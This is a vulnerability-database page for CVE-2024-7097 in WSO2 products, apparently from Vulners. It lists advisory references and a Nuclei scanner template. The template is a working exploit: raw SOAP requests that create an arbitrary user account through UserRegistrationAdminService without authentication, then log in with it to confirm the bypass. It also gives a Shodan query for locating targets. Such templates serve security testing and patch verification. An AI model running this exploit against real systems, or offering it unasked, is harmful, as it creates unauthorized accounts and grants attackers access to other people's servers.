| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| CVE-2024-7097 | 15 Jan 202512:42 | – | circl | |
| WSO2多款产品 安全漏洞 | 30 May 202500:00 | – | cnnvd | |
| CVE-2024-7097 | 30 May 202515:04 | – | cve | |
| CVE-2024-7097 Incorrect Authorization in Multiple WSO2 Products via SOAP Admin Service Allowing Unauthorized User Signup | 30 May 202515:04 | – | cvelist | |
| EUVD-2025-16505 | 3 Oct 202520:07 | – | euvd | |
| CVE-2024-7097 | 30 May 202515:15 | – | nvd | |
| PT-2025-3690 | 14 Jan 202500:00 | – | ptsecurity | |
| CVE-2024-7097 | 1 Jun 202515:36 | – | redhatcve | |
| VulnCheck KEV: CVE-2024-7097 | 2 Feb 202500:00 | – | vulncheck_kev | |
| CVE-2024-7097 Incorrect Authorization in Multiple WSO2 Products via SOAP Admin Service Allowing Unauthorized User Signup | 30 May 202515:04 | – | vulnrichment |
id: CVE-2024-7097
info:
name: WSO2 User Registration - Arbitrary Account Creation
author: iamnoooob,rootxharsh,pdresearch
severity: medium
description: |
The SOAP admin service in WSO2 products has a security vulnerability that allows the creation of new user accounts regardless of the self-registration configuration settings.
impact: |
Unauthenticated attackers can bypass self-registration restrictions to create arbitrary user accounts, potentially gaining unauthorized access to the WSO2 system and its resources.
remediation: |
Apply security patches from WSO2 as outlined in security advisory WSO2-2024-3574 to address the arbitrary account creation vulnerability.
reference:
- https://sec.vnpt.vn/2025/01/canh-bao-lo-hong-nghiem-trong-tren-nen-tang-xac-thuc-tap-trung-wso2-anh-huong-den-nhieu-co-quan-to-chuc-bo-ban-nganh/
- https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2024/WSO2-2024-3574/
classification:
epss-score: 0.0054
epss-percentile: 0.41271
metadata:
verified: true
max-request: 2
shodan-query: "WSO2 Carbon Server"
tags: cve,cve2024,wso2,intrusive,auth-bypass,vkev,vuln
variables:
username: "{{randstr_1}}"
password: "{{randstr_2}}"
flow: http(1) && http(2)
http:
- raw:
- |
POST /services/UserRegistrationAdminService.UserRegistrationAdminServiceHttpsSoap11Endpoint/ HTTP/1.1
Host: {{Hostname}}
SOAPAction: "urn:addUser"
Content-Type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsd="http://org.apache.axis2/xsd">
<soapenv:Header/>
<soapenv:Body>
<xsd:addUser>
<xsd:user>
<xsd:userName>{{username}}</xsd:userName>
<xsd:password>{{password}}</xsd:password>
</xsd:user>
</xsd:addUser>
</soapenv:Body>
</soapenv:Envelope>
matchers:
- type: status
status:
- 202
internal: true
- raw:
- |
POST /services/AuthenticationAdmin HTTP/1.1
Host: {{Hostname}}
SOAPAction: ""
Content-Type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:aut="http://authentication.services.core.carbon.wso2.org">
<soapenv:Header/>
<soapenv:Body>
<aut:login>
<aut:username>{{username}}</aut:username>
<aut:password>{{password}}</aut:password>
</aut:login>
</soapenv:Body>
</soapenv:Envelope>
matchers:
- type: word
words:
- "loginResponse"
- "<ns:return>true</ns:return>"
condition: and
# digest: 490a0046304402204d5861a8a3df58260d4e1abaf5f8c371e4446d8892c521c43b331ae803c7e078022007a1e3c92394eb6243bc2f069686bf1d9857c0c22fc8ff534d029836fd2b60f1:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation